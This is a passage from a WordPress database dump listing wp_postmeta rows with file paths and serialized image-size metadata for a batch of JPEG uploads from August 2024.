:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2697,984,'_wp_attached_file','2024/08/S__69214237_0-1.jpg'),
(2698,984,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214237_0-1.jpg\";s:8:\"filesize\";i:617584;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214237_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18809;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214237_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:163865;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214237_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8973;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214237_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98646;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214237_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:317059;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214237_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24610;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2699,985,'_wp_attached_file','2024/08/S__69214239_0-1.jpg'),
(2700,985,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214239_0-1.jpg\";s:8:\"filesize\";i:646877;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214239_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17656;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214239_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:163134;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214239_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8599;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214239_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96669;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214239_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:324522;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214239_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22898;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2701,986,'_wp_attached_file','2024/08/S__69214240_0-1.jpg'),
(2702,986,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214240_0-1.jpg\";s:8:\"filesize\";i:662395;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214240_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17623;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214240_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:166460;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214240_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8408;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214240_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98790;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214240_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:331136;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214240_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22978;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2703,987,'_wp_attached_file','2024/08/S__69214241_0-1.jpg'),
(2704,987,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:27:\"2024/08/S__69214241_0-1.jpg\";s:8:\"filesize\";i:680350;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214241_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17868;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214241_0-1-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:173716;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214241_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8277;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214241_0-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102342;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214241_0-1-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:344598;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214241_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23563;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2705,988,'_wp_attached_file','2024/08/S__69214242_0-1.jpg'),
(2706,988,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:27:\"2024/08/S__69214242_0-1.jpg\";s:8:\"filesize\";i:793760;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214242_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18757;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214242_0-1-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:199419;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214242_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9115;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214242_0-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:116296;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214242_0-1-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:402481;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214242_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24874;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2707,989,'_wp_attached_file','2024/08/S__69214243_0-1.jpg'),
(2708,989,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:27:\"2024/08/S__69214243_0-1.jpg\";s:8:\"filesize\";i:770384;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214243_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17117;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214243_0-1-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:185607;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214243_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7872;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214243_0-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106929;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214243_0-1-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:380573;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214243_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22520;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2709,990,'_wp_attached_file','2024/08/S__69214244_0-1.jpg'),
(2710,990,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:27:\"2024/08/S__69214244_0-1.jpg\";s:8:\"filesize\";i:634789;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214244_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16065;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214244_0-1-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:159019;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214244_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7494;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214244_0-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94165;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214244_0-1-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:317936;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214244_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21161;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2711,991,'_wp_attached_file','2024/08/S__69214245_0-1.jpg'),
(2712,991,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:27:\"2024/08/S__69214245_0-1.jpg\";s:8:\"filesize\";i:648157;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214245_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15928;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214245_0-1-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:161656;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214245_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7704;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214245_0-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95136;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214245_0-1-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:324288;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214245_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21116;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2713,992,'_wp_attached_file','2024/08/S__69214235_0-1.jpg'),
(2714,992,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214235_0-1.jpg\";s:8:\"filesize\";i:686102;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214235_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19779;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214235_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:179407;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214235_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9450;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214235_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107319;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214235_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:349682;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214235_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25967;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2715,993,'_wp_attached_file','2024/08/S__69214238_0-1.jpg'),
(2716,993,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214238_0-1.jpg\";s:8:\"filesize\";i:618849;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214238_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18791;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214238_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:164209;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214238_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9030;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214238_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99064;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214238_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:318020;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214238_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24658;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2717,994,'_wp_attached_file','2024/08/S__69214250_0-1.jpg'),
(2718,994,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:27:\"2024/08/S__69214250_0-1.jpg\";s:8:\"filesize\";i:543408;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214250_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15261;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214250_0-1-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:139145;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214250_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7575;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214250_0-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83264;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214250_0-1-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:276622;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214250_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19179;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2719,995,'_wp_attached_file','2024/08/S__69214248_0-1.jpg'),
(2720,995,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:27:\"2024/08/S__69214248_0-1.jpg\";s:8:\"filesize\";i:336296;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214248_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14411;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214248_0-1-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98333;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214248_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7263;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214248_0-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62770;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214248_0-1-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:181110;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214248_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17927;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2721,996,'_wp_attached_file','2024/08/S__69214252_0-1.jpg'),
(2722,996,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:27:\"2024/08/S__69214252_0-1.jpg\";s:8:\"filesize\";i:649229;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214252_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16647;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214252_0-1-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:162700;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214252_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7963;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214252_0-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95678;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214252_0-1-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:327256;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214252_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21287;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2723,997,'_wp_attached_file','2024/08/S__69214246_0-1.jpg'),
